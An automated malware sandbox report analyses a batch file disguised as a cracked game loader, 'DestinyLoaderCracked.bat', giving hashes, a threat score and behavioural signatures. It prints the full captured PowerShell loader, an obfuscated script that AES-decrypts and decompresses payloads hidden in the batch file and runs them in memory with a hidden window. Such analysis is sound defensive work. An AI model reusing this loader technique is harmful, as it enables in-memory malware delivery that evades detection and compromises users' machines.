Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 19:24
Static task
static1
Behavioral task
behavioral1
Sample
DestinyLoaderCracked.bat
Resource
win7-20241010-en
4 signatures
150 seconds
General
-
Target
DestinyLoaderCracked.bat
-
Size
327KB
-
MD5
d0eef460c098ddfab73bffe09b5576f1
-
SHA1
72a9d083d85037abf060c027ceb2f4c7d83b8d42
-
SHA256
94bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a
-
SHA512
eaf4b8a20787685ac516f8c8fa27052df7e8100180cdbb16fdbc1dcdc33ede7623ed1ce1abbd24146bc2dc63c4e55fb36957dc731b005d71fd781e1a1b72e8d3
-
SSDEEP
6144:fS/P9VWTPTlLWWUY+GVH0I2mjYTNZTNSq78e89aOki5M:YP/2PTlLVUI2mMTTn8e89Ii5M
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2612 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3064 wrote to memory of 2612 3064 cmd.exe 31 PID 3064 wrote to memory of 2612 3064 cmd.exe 31 PID 3064 wrote to memory of 2612 3064 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DestinyLoaderCracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('St/Wt6vqm9kaTmxnEI7FVwFJ79tdiegvPTsnH2ymwRU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cXqlF3UWhJzCcuDvG48+Og=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rsudL=New-Object System.IO.MemoryStream(,$param_var); $nFnkD=New-Object System.IO.MemoryStream; $wnAvt=New-Object System.IO.Compression.GZipStream($rsudL, [IO.Compression.CompressionMode]::Decompress); $wnAvt.CopyTo($nFnkD); $wnAvt.Dispose(); $rsudL.Dispose(); $nFnkD.Dispose(); $nFnkD.ToArray();}function execute_function($param_var,$param2_var){ $lNmdI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjmD=$lNmdI.EntryPoint; $CXjmD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\DestinyLoaderCracked.bat';$iYYFP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DestinyLoaderCracked.bat').Split([Environment]::NewLine);foreach ($DzSDP in $iYYFP) { if ($DzSDP.StartsWith(':: ')) { $HXwqb=$DzSDP.Substring(3); break; }}$payloads_var=[string[]]$HXwqb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-